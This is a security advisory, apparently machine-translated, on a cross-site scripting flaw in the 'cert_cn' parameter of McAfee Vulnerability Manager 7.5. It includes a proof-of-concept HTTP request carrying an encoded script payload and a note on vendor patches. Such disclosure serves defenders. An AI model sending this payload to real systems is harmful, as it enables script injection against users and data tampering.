McAfee Vulnerability Manager 'cert _ cn' Parameter Cross-Site Scripting Vulnerability

McAfee Vulnerability Manager 'cert _ cn' Parameter Cross-Site Scripting Vulnerability

Release date:
Updated on: 2013-03-11

Affected Systems:
McAfee Vulnerability Manager 7.5
Description:
--------------------------------------------------------------------------------
Bugtraq id: 58401
 
McAfee Vulnerability Manager integrates real-time Asset detection, risk-based scanning, and superior performance to provide continuous asset monitoring.
 
McAfee Vulnerability Manager 7.5 and other versions have the XSS Vulnerability. After successful exploitation, attackers can destroy applications, access or modify data, and exploit other vulnerabilities.
 
<* Source: Asheesh Anaconda

Link: http://packetstormsecurity.com/files/120721/mcafee75-xss.txt
*>

Test method:
--------------------------------------------------------------------------------

Alert

The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!
GET/www.example.com/index.exp HTTP/1.1
Cookie: identity = p805oa53c0dab5vpcv1da30me7;
Cert_cn = % 27% 22% 28% 29% 26% 251% 3 CScRiPt % 3 Eprompt % 28920847% 29% 3C % 2 FScRiPt % 3E;
Remember = remember
Host: 172.28.1.1
Connection: Keep-alive
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept :*/*

Suggestion:
--------------------------------------------------------------------------------
Vendor patch:
 
McAfee
------
Currently, the vendor does not provide patches or upgrade programs. We recommend that users who use the software follow the vendor's homepage to obtain the latest version:
 
Http://www.mcafee.com/cn/products/vulnerability-manager.aspx